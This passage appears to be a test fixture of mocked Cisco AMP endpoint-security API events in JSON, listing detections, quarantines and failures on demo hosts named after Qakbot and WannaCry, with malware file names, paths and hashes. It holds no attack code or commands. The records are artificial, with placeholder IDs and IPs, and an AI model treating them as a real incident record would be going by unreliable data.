Failed","event_type_id":2164260893,"detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":542000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat 